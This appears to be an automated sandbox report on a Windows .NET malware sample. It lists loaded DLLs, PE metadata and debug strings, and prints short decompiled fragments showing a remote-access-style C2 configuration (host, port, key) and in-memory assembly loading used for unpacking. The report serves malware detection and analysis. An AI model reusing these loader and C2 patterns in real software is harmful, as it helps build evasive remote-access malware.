Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbs source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601179462.000000000683A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: fSgG.pdbSHA256 source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Source:	Binary string: Accessibility.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.ni.pdbRSDS source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: n.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: n0C:\Windows\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb$ source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Configuration.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Xml.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Core.ni.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: \??\C:\Windows\symbols\exe\fSgG.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: %%.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.0000000006797000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp, WER7A57.tmp.dmp.13.dr
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb] source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601179462.000000000683A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\fSgG.pdbe source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601179462.000000000683A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Windows.Forms.pdb\|c source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: \??\C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.PDB source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3595773433.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbSK source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Drawing.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: mscorlib.ni.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Management.ni.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: fSgG.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Source:	Binary string: symbols\dll\mscorlib.pdbLb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.ni.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER7A57.tmp.dmp.13.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, Form1.cs	.Net Code: InitializeComponent
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, D0OGH51qG7TrJUYkAK.cs	.Net Code: mXM9LNPFbq System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.2645004.3.raw.unpack, QBy45BY4uMbUQs88Qq.cs	.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Messages.cs	.Net Code: Memory
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Messages.cs	.Net Code: Memory
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.2638bc0.2.raw.unpack, QBy45BY4uMbUQs88Qq.cs	.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, D0OGH51qG7TrJUYkAK.cs	.Net Code: mXM9LNPFbq System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, D0OGH51qG7TrJUYkAK.cs	.Net Code: mXM9LNPFbq System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6870000.6.raw.unpack, QBy45BY4uMbUQs88Qq.cs	.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])

Binary contains a suspicious time stamp

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Static PE information: 0xBE7B7599 [Wed Apr 8 23:41:13 2071 UTC]

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 0_2_009DEE10 pushfd ; iretd		0_2_009DEE11
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_05458160 push esp; iretd		5_2_05458161

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Static PE information: section name: .text entropy: 7.7368081138603095

Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, D0OGH51qG7TrJUYkAK.cs	High entropy of concatenated method names: 'JR1JRG4y8a', 'vkKJELq1PC', 'l5sJs5sanZ', 'vc3JU9mP0w', 'udAJwk20H2', 'NVOJAsXNxk', 'vZrJGXjZpa', 'hOYJ1ONTlx', 'vkBJeFlcO3', 'UfHJqc9CV3'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, YqOlYl2eFwtfPkt21E.cs	High entropy of concatenated method names: 'zeuskKjA1L', 't6dsi7fBC6', 'HtBsISLSjw', 'IjpsWUhMnN', 'GbBsNlvb8J', 'MudsDxrVUJ', 'jrMsSOuYyZ', 'lxPsfYHPr4', 'FOasMfJJ1Z', 'PsVsOWW9qL'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, MhaIhDzaPUNsFfpULt.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BeHV4wgTlM', 'oqSV0vtKm2', 'FRCVj69MJH', 'I5bVHhfCuL', 'bGsVKaNcsB', 'yQ2VVSVK2Y', 'G6UVX46uPx'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, RqmCPZsVMMv5nbrMN6.cs	High entropy of concatenated method names: 'Dispose', 'TqEvMbYPBl', 'E1Dbl6QgMl', 'aLH9986UWT', 'fvIvOGDt4q', 'zpMvzXZpZX', 'ProcessDialogKey', 'fpCbuonY1J', 'u2Dbv8ygbK', 'QcGbbwGrKv'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, iNFWmT65K4oBOHdv97.cs	High entropy of concatenated method names: 'Wl4AR8MHHE', 'titAsqu8Kd', 'abTAwE5JMD', 'uogAGwP4vc', 'ujcA1qT3i8', 'eblwNEOGXG', 'm4uwDHFCio', 'QcSwS2rJtO', 'KaowfZguGr', 'ajXwMnqCsI'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, mdHoHt9MfgQhGOrMY7.cs	High entropy of concatenated method names: 'WFOvGqOlYl', 'lFwv1tfPkt', 'p3avqmmghX', 'wN9voE8Vt6', 'ndiv0ZgANF', 'TmTvj5K4oB', 'h2CgQ5y5XUUsiTJhmL', 'CZR8tK8FjhjBByWFCT', 'tSlvvtTwth', 'YalvJN7MuA'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, gkMdOYbUoH9rcjFeuZ.cs	High entropy of concatenated method names: 'd9wLtM8M4', 'Q0ug5PUUG', 'qIldgNNAC', 'bOQYR4RJA', 'jdec7qMwi', 'fwsQtawSe', 'q10rCeFp93vb3FnsYl', 'nAVdAUHX1OuFXTaYJ5', 'SReucDfU4e0o5OcQkW', 'hNbKyY2mW'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, PonY1JM82D8ygbKCcG.cs	High entropy of concatenated method names: 'n2LK6NIN2w', 'DPiKl4fHrB', 'K1sK72UjWb', 'Om9K5FsIXk', 'hkJKkFF2wb', 'YxtKpoI6uL', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, OOJ1Sjc3ammghXBN9E.cs	High entropy of concatenated method names: 'jy7UgP62MX', 'f3uUdagdZm', 'X4AU26DqcP', 'aysUcGwFIG', 'wbPU0hveJe', 'vEMUjDqhgi', 'ib2UH07rxZ', 'gHiUKaMWDi', 'GemUVCvHPy', 'X2wUXKmYVB'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, ChekuZ3HCIwSmN8ZNP.cs	High entropy of concatenated method names: 'agrGEhicPZ', 'FydGUJrVl5', 'cK2GA3q7rS', 'DAqAOVF3Jn', 'VtcAzxQMXs', 'cCAGunM6aN', 'AtFGvEHcbJ', 'EkQGb7xa9e', 'ncEGJrZ37u', 'eyuG9aSySR'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, LDBvEBvJJ3O33kFquaV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Xi4XkqBNKI', 'Y2bXiB2U7k', 'FOxXIZQaM5', 'KamXW2Gu9D', 'IHvXN21gAX', 'KGtXDVUCTG', 'LdkXS8cZvG'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, ySkLlbvukfHRnCTtESI.cs	High entropy of concatenated method names: 'gLXVP5FDHj', 'aSkVZK37or', 'HG7VLuGtTa', 'soAVgBft2a', 'PtRVTjr7Id', 'rHaVdWW1jN', 'QjgVYcgLJ3', 'OmiV2hkTWw', 'Y55Vc8phEb', 'B2CVQTE6FE'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, aIGDt4fqLpMXZpZXEp.cs	High entropy of concatenated method names: 'SUAKEhmXdr', 'eHCKsVIEDR', 'SuuKUxDlwg', 'yRMKwgOGM8', 'xdlKA6pPcH', 'T94KG2yKTT', 'GjLK1KBe6N', 'ABlKejwfBe', 'bvaKqUYxLT', 'tDuKo8ou3Q'
